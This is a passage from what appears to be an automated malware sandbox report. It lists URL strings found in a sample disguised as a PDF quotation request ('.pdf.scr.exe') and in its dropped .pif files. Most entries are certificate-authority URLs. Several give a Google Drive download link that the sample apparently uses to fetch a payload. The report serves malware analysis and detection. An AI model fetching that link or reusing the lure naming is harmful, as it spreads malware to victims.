00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drString found in binary or memory: http://www.pmail.com0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.000000002089D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.000000002087F000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020868000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000097D000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000959000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000097D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=downloadP
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=downlo
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
